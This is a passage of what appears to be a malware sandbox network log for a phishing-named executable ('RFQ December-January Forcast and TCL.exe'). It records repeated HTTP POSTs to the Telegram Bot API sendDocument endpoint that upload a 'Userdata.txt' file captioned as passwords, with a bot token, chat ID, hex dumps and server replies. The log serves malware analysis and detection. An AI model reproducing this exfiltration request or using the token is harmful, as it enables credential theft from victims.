                                                                                                          2024-12-18 08:52:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 32 66 62 31 34 61 61 39 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd202fb14aa943Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:31 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:30 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:31 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38687,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511950,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.449831149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:33 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd2053b6e78698
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:52:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 35 33 62 36 65 37 38 36 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd2053b6e78698Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:34 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:34 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:34 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38688,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511954,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.449843149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:37 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd2078d8a23e11
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:52:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 37 38 64 38 61 32 33 65 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd2078d8a23e11Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:38 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:37 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:38 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38689,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511957,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.449850149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:40 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd209f10201f24
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-18 08:52:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 39 66 31 30 32 30 31 66 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd209f10201f24Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:41 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:41 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:41 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38690,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511961,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.449862149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:44 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd20c3bcaf4e02
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-18 08:52:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 63 33 62 63 61 66 34 65 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd20c3bcaf4e02Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:44 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:44 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 536
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:44 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38691,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511964,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.449869149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:47 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd20f002538289
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:52:47 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 66 30 30 32 35 33 38 32 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd20f002538289Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:48 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:48 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:48 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38692,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511968,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.449881149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:51 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd211fe290318a
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:52:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 31 66 65 32 39 30 33 31 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd211fe290318aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:51 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:51 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:51 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38693,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511971,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.449889149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:54 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd21520b83928e
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
